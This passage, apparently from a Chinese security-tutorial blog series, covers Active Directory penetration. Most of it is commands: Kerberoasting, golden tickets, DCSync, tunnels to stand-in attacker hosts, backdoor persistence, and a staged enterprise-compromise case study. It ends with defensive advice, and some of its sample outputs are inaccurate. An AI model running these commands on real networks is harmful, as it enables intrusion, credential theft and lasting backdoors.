Get-DomainUser -Filter "(adminCount=1)" # 查找管理员 # 获取计算机 $ Get-DomainComputer $ Get-DomainComputer -Filter "(operatingsystem=*server*)" # 查找服务器 # 获取组 $ Get-DomainGroup $ Get-DomainGroupMember "Domain Admins" # 获取域管成员 # 获取 OU $ Get-DomainOU # 获取 GPO $ Get-DomainGPO $ Get-DomainGPOAppliedUser # 查找共享文件夹 $ Find-DomainShare $ Find-InterestingFile -Path \\*\SYSVOL\* ``` **BloodHound 收集**: ```powershell # 使用 SharpHound $ .\SharpHound.exe -c All # 收集特定信息 $ .\SharpHound.exe -c Group,LocalAdmin,GPOLocalGroup,Session,LoggedOn,Trusts,ACL,Container,RDP,DCOM,PSRemote,LocalGroup # 使用 PowerShell $ Invoke-BloodHound -CollectionMethod All # 上传到 BloodHound # 打开 BloodHound Web 界面 # 上传 JSON 文件 # 分析攻击路径 ``` ### 域权限提升 **Kerberoasting**: ```powershell # 使用 PowerView $ Get-DomainUser -SPN | Select-Object sAMAccountName,servicePrincipalName # 请求票据 $ Request-SPNTicket -SPN "MSSQLSvc/sql.corp.local" # 使用 Rubeus $ Rubeus.exe kerberoast /outfile:hashes.txt # 使用 Impacket $ impacket-GetUserSPNs corp.local/Administrator:Password -request # 破解哈希 $ hashcat -m 13100 hashes.txt wordlist.txt $ john --format=krb5tgs hashes.txt ``` **AS-REP Roasting**: ```powershell # 查找不需要预认证的用户 $ Get-DomainUser -PreauthNotRequired # 使用 Rubeus $ Rubeus.exe asreproast /outfile:hashes.txt # 使用 Impacket $ impacket-GetNPUsers corp.local/ -usersfile users.txt -format hashcat # 破解哈希 $ hashcat -m 18200 hashes.txt wordlist.txt ``` **约束委派攻击**: ```powershell # 查找约束委派 $ Get-DomainUser -TrustedToAuth # 使用 Rubeus $ Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/fileserver.corp.local /ptt # 使用 Impacket $ impacket-ticketconverter svc_account.kirbi svc_account.ccache $ export KRB5CCNAME=svc_account.ccache $ impacket-psexec -k -no-pass fileserver.corp.local ``` ### 域持久化 **黄金票据**: ```powershell # 需要 krbtgt 哈希 mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt # 使用 Rubeus $ Rubeus.exe golden /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /user:admin /id:500 /ptt # 验证票据 $ klist # 使用票据访问 $ psexec \\dc01.corp.local cmd ``` **白银票据**: ```powershell # 需要服务账户哈希 mimikatz # kerberos::silver /service:cifs /domain:corp.local /sid:S-1-5-21-xxx /rc4:hash /ptt # 使用 Rubeus $ Rubeus.exe silver /service:cifs /domain:corp.local /rc4:hash /ptt # 访问文件服务器 $ psexec \\fileserver.corp.local cmd ``` **DCSync 攻击**: ```powershell # 使用 Mimikatz mimikatz # lsadump::dcsync /user:CORP\krbtgt mimikatz # lsadump::dcsync /user:CORP\Administrator # 使用 Impacket $ impacket-secretsdump -just-dc-user krbtgt CORP/Administrator:Password@192.168.1.10 $ impacket-secretsdump -just-dc CORP/Administrator:Password@192.168.1.10 # 需要权限 # - Replicating Directory Changes # - Replicating Directory Changes All ``` --- ## 内网隧道技术 ### SOCKS 代理 **Metasploit SOCKS**: ```bash # 启动 SOCKS 代理 meterpreter > run autoroute -s 192.168.10.0/24 meterpreter > run server -p reverse_tcp -H 10.10.10.5 -P 4444 # 配置 proxychains $ cat /etc/proxychains.conf [ProxyList] socks4 127.0.0.1 1080 # 使用代理扫描 $ proxychains nmap -sT 192.168.10.0/24 # 使用代理访问 $ proxychains curl http://192.168.10.10 $ proxychains rdesktop 192.168.10.10 ``` **SSH 隧道**: ```bash # 本地端口转发 $ ssh -L 8080:internal-server:80 user@gateway # 远程端口转发 $ ssh -R 8080:localhost:22 user@attacker # 动态端口转发(SOCKS) $ ssh -D 1080 user@gateway # 多级跳板 $ ssh -J user@jump1,user@jump2 user@target # SSH 隧道结合 proxychains $ proxychains -f proxychains.conf curl http://target ``` ### HTTP 隧道 **reGeorg 隧道**: ```bash # 上传 reGeorg 脚本 $ python reGeorgSockets.py -u http://target/shell.php -p 8080 # 配置 proxychains $ cat /etc/proxychains.conf [ProxyList] socks4 127.0.0.1 8080 # 使用隧道 $ proxychains nmap -sT 192.168.1.0/24 $ proxychains crackmapexec smb 192.168.1.0/24 ``` **Chisel 隧道**: ```bash # 启动服务器 $ ./chisel server -p 8080 --reverse # 客户端连接 $ ./chisel client attacker:8080 R:socks # 配置 proxychains $ cat /etc/proxychains.conf [ProxyList] socks4 127.0.0.1 1080 ``` ### DNS 隧道 **dnscat2 隧道**: ```bash # 启动服务器 $ dnscat2-server --security=open att # 客户端连接 $ dnscat2 --dns server=attacker.com --secret=secret # 建立隧道后 # 可以执行命令、传输文件 ``` **iodine 隧道**: ```bash # 服务器端 $ iodined -f -c -P password 10.0.0.1 dns.attacker.com # 客户端 $ iodine -f -P password dns.attacker.com # 建立虚拟网卡 # 可以通过虚拟网卡进行通信 ``` --- ## 内网持久化 ### Windows 持久化 **常见方法**: ```powershell # 注册表运行键 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe" # 计划任务 schtasks /create /tn WindowsUpdate /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM # 服务创建 sc create Backdoor binPath= "C:\backdoor.exe" start= auto sc start Backdoor # WMI 持久化 $ filterName = "WindowsUpdate" $ consumerName = "UpdateConsumer" $ command = "C:\backdoor.exe" $ filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"} $ consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$command; CommandLineTemplate=$command} Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$filter; Consumer=$consumer} # 域持久化 # 黄金票据 # 白银票据 # DCSync ``` ### Linux 持久化 **常见方法**: ```bash # cron 持久化 $ echo "* * * * * root /backdoor.sh" >> /etc/crontab $ echo "* * * * * /backdoor.sh" | crontab - # systemd 服务 $ cat > /etc/systemd/system/backdoor.service << EOF [Unit] Description=Backdoor Service After=network.target [Service] Type=simple ExecStart=/backdoor.sh Restart=always [Install] WantedBy=multi-user.target EOF $ systemctl enable backdoor $ systemctl start backdoor # SSH 密钥持久化 $ echo "ssh-rsa AAAA... attacker@kali" >> ~/.ssh/authorized_keys $ echo "ssh-rsa AAAA... attacker@kali" >> /root/.ssh/authorized_keys # Shell 配置持久化 $ echo "/backdoor.sh &" >> ~/.bashrc $ echo "/backdoor.sh &" >> /etc/profile # LD_PRELOAD 劫持 $ echo "/lib/backdoor.so" >> /etc/ld.so.preload ``` --- ## 内网渗透实战案例 ### 案例背景 **目标**:某大型企业内网 **初始访问**:钓鱼邮件获取工作站权限 **目标**:获取域控权限、核心数据 ### 攻击过程 #### 第 1 阶段:初始访问 ```powershell # 钓鱼邮件获取 Shell meterpreter > getuid Server username: CORP\user1 meterpreter > sysinfo Computer: WORKSTATION-01 OS: Windows 10 (Build 19042) Domain: CORP ``` #### 第 2 阶段:内网侦察 ```powershell # 网络信息 meterpreter > run get_local_subnets meterpreter > run arp_scanner -r 192.168.1.0/24 # 发现网段 192.168.1.0/24 - 办公网 192.168.10.0/24 - 服务器网 192.168.20.0/24 - 数据库网 # 扫描服务器网段 $ nmap -sS -sV 192.168.10.0/24 发现: 192.168.10.10:80 - Web 服务器 192.168.10.20:445 - 文件服务器 192.168.10.30:3389 - 远程桌面 192.168.20.10:3306 - MySQL 数据库 ``` #### 第 3 阶段:凭证收集 ```powershell # 转储哈希 meterpreter > load kiwi meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: user1:1000:aad3b435b51404eeaad3b435b51404ee:Password123!::: # 抓取明文密码 meterpreter > creds_all CORP\user1 Password123! CORP\admin Admin@123456 ``` #### 第 4 阶段:横向移动 ```powershell # 使用 PtH 访问文件服务器 $ impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.10.20 # 获取文件服务器权限 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM # 收集更多凭证 meterpreter > load kiwi meterpreter > creds_all ``` #### 第 5 阶段:域渗透 ```powershell # 域信息收集 $ .\SharpHound.exe -c All # BloodHound 分析 # 发现攻击路径:user1 → Server Admin → Domain Admin # Kerberoasting $ Rubeus.exe kerberoast /outfile:hashes.txt # 破解服务账户密码 $ hashcat -m 13100 hashes.txt wordlist.txt svc_sql:SqlService@2024 # 使用服务账户访问数据库服务器 $ impacket-psexec -u svc_sql -p SqlService@2024 192.168.20.10 ``` #### 第 6 阶段:域控权限 ```powershell # DCSync 攻击 $ impacket-secretsdump -just-dc-user krbtgt CORP/Administrator:Admin@123456@192.168.1.10 # 获取 krbtgt 哈希 krbtgt:aad3b435b51404eeaad3b435b51404ee:KrbtgtHash123::: # 黄金票据 mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:KrbtgtHash123 /id:500 /ptt # 访问域控 $ psexec \\dc01.corp.local cmd ``` #### 第 7 阶段:数据收集 ```powershell # 数据库导出 $ mysqldump -u root -p core_database > core_data.sql # 文件服务器数据 $ zip -r sensitive_data.zip /data/financial/ /data/customer/ # 域控数据 $ impacket-secretsdump -just-dc CORP/admin@dc01.corp.local -outputfile domain_hashes ``` #### 第 8 阶段:持久化 ```powershell # 创建后门账户 $ net user backdoor P@ssw0rd123! /add $ net localgroup administrators backdoor /add # 黄金票据持久化 # 可以随时生成域管票据 # 计划任务 $ schtasks /create /tn WindowsUpdate /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM ``` ### 攻击总结 | 阶段 | 技术 | 成果 | |------|------|------| | 初始访问 | 钓鱼邮件 | 获取工作站 Shell | | 内网侦察 | 网络扫描 | 发现 3 个网段、10+ 服务器 | | 凭证收集 | Mimikatz | 获取 5+ 个有效凭证 | | 横向移动 | PtH、PsExec | 控制 5 台服务器 | | 域渗透 | Kerberoasting | 获取服务账户权限 | | 域控权限 | DCSync、黄金票据 | 获取域管权限 | | 数据收集 | 数据库导出 | 获取核心业务数据 | | 持久化 | 多种后门 | 维持长期访问 | --- ## 内网渗透最佳实践 ### 测试清单 ``` ┌─────────────────────────────────────────────────────────────┐ │ 内网渗透测试清单 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 信息收集 │ │ □ 主机信息收集 │ │ □ 网络拓扑发现 │ │ □ 凭证收集 │ │ □ 敏感数据定位 │ │ │ │ 横向移动 │ │ □ Pass-the-Hash 测试 │ │ □ Pass-the-Ticket 测试 │ │ □ PsExec/WMI 测试 │ │ □ SSH 横向移动测试 │ │ □ DCOM 横向移动测试 │ │ │ │ 域渗透 │ │ □ 域信息收集 │ │ □ Kerberoasting 测试 │ │ □ AS-REP Roasting 测试 │ │ □ 委派攻击测试 │ │ □ DCSync 测试 │ │ □ 黄金/白银票据测试 │ │ │ │ 隧道技术 │ │ □ SOCKS 代理测试 │ │ □ SSH 隧道测试 │ │ □ HTTP 隧道测试 │ │ □ DNS 隧道测试 │ │ │ │ 持久化 │ │ □ 注册表持久化测试 │ │ □ 计划任务测试 │ │ □ 服务创建测试 │ │ □ WMI 持久化测试 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 工具组合 **推荐工具组合**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 内网渗透工具组合 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 基础工具: │ │ ├── Metasploit(渗透框架) │ │ ├── CrackMapExec(内网扫描) │ │ ├── Impacket(Python 工具集) │ │ └── Mimikatz(凭证收集) │ │ │ │ 枚举工具: │ │ ├── BloodHound(域分析) │ │ ├── PowerView(PowerShell 枚举) │ │ ├── Nmap(网络扫描) │ │ └── Responder(LLMNR/NBT-NS 欺骗) │ │ │ │ 隧道工具: │ │ ├── Chisel(TCP 隧道) │ │ ├── reGeorg(HTTP 隧道) │ │ ├── dnscat2(DNS 隧道) │ │ └── SSH(SOCKS 代理) │ │ │ └─────────────────────────────────────────────────────────────┘ ``` --- ## 总结与思考 ### 核心要点回顾 1. **内网渗透是渗透测试的核心价值**,决定最终攻击成果 2. **信息收集是基础**,充分了解内网结构才能有效移动 3. **凭证是关键**,凭证是内网横向移动的通行证 4. **域渗透是目标**,控制域控等于控制整个内网 5. **隧道技术是保障**,确保攻击通道稳定可靠 ### 深入思考 **问题 1:云环境对内网渗透的影响?** 我的观点: - 传统内网边界模糊 - 云原生环境新的攻击面 - 容器逃逸成为新热点 - 云凭证管理更关键 **问题 2:零信任架构的挑战?** 我认为: - 传统横向移动更困难 - 需要更多凭证和身份 - 微隔离增加复杂度 - 但人为因素仍是弱点 **问题 3:内网渗透的演进趋势?** 我预测: - 自动化程度提高 - AI 辅助攻击路径分析 - 云地混合环境渗透 - 供应链攻击增加 ### 实战建议 **给新手的建议**: ``` 1. 搭建实验环境 - Active Directory 实验环境 - 多台虚拟机组网 - 模拟真实企业网络 2. 学习基础 - Windows/Linux 系统原理 - 网络协议(SMB、LDAP、Kerberos) - 域架构理解 3. 掌握工具 - Metasploit(精通) - CrackMapExec(熟练) - BloodHound(熟练) - Mimikatz(熟练) 4. 持续练习 - HackTheBox Pro Labs - TryHackMe AD 房间 - 自建实验环境 ``` **给企业的建议**: ``` 1. 网络分段 - 办公网、服务器网、数据库网分离 - 严格访问控制 - 监控跨网段流量 2. 权限管理 - 最小权限原则 - 定期审查权限 - 分离管理账户 3. 监控检测 - 部署 SIEM - 监控异常登录 - 检测横向移动 4. 定期演练 - 红队演练 - 内网渗透测试 - 应急响应演练 ``` --- ## 参考资料 ### 学习资源 | 资源 | 类型 | 链接 | |------|------|------| | **ATT&CK 框架** | 知识库 | https://attack.mitre.org | | **Red Team Notes** | 笔记 | https://www.ired.team | | **BloodHound 文档** | 文档 | https://bloodhound.readthedocs.io | | **CrackMapExec 文档** | 文档 | https://crackmapexec.readthedocs.io | ### 工具资源 | 工具 | 官网 | 用途 | |------|------|------| | **Metasploit** | https://metasploit.com | 渗透框架 | | **CrackMapExec** | GitHub | 内网扫描 | | **Impacket** | GitHub | Python 工具集 | | **Mimikatz** | GitHub | 凭证收集 | | **BloodHound** | GitHub | 域分析 | | **Chisel** | GitHub | TCP 隧道 | | **reGeorg** | GitHub | HTTP 隧道 | ### 书籍推荐 | 书名 | 作者 | 难度 | |------|------|------| | 《Red Team Development and Operations》 | Joe Vest | 进阶 | | 《Advanced Penetration Testing》 | Wil Allsopp | 高级 | | 《The Red Team Field Manual》 | Ben Clark | 参考 | | `《Domain Penetration Testing》` | various | 实战 | --- *365 天信息安全技术系列 | Day 218 | 内网渗透技术详解 | 字数:约 26,000 字*
myh0st
2026年4月13日 23:20
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